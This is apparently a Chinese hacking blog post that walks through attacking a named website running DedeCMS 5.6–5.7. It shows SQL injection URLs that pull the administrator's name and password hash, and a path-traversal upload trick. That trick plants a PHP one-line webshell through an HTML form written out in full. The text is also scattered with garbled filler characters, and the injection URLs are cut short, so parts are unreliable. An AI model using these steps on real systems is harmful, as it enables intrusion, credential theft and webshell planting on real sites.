dedecms5.6-5.7注入与上传漏洞利用

admin

①注入漏洞。
" G+ {) e/ [" S4 r这站 http://www.political-security.com/
. ~- C9 S; B  d  x! q3 h1 {2 u首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
www.political-security.com/data/mysql_error_trace.inc 爆后台
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
然后写上语句
查看管理员帐号
# v5 {) _- d# y9 dhttp://www.political-security.co ... &membergroup=@`
) J! c9 z. D; G2 A  ~) o
admin

查看管理员密码
　http://www.political-security.co ... &membergroup=@`
' {" Q3 |0 ]: x2 P
7 t( }( ?! O6 e2 O1 i# e9 g: I' y8d29b1ef9f8c5a5af429
: G. Q+ u* c) j* @0 T9 K) _4 H0 {
查看管理员密码

得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5
/ v* D& n/ p' T
8d2
9b1ef9f8c5a5af42
9
9 W% W3 p) {' T9 Z% b- q; d
cmd5没解出来 只好测试第二个方法

% p: [+ E# _9 L( c
②上传漏洞：
! R7 w0 P; u$ e8 U
3 _7 A( s- |+ q* t2 C% Y) O只要登陆会员中心，然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
- E! E  [& ], ?. ^0 b9 P# g. M
2 a# y. F+ ?" Q5 Q2 B如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm

<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
或者
5 `* p: i4 }( w8 l即可上传成功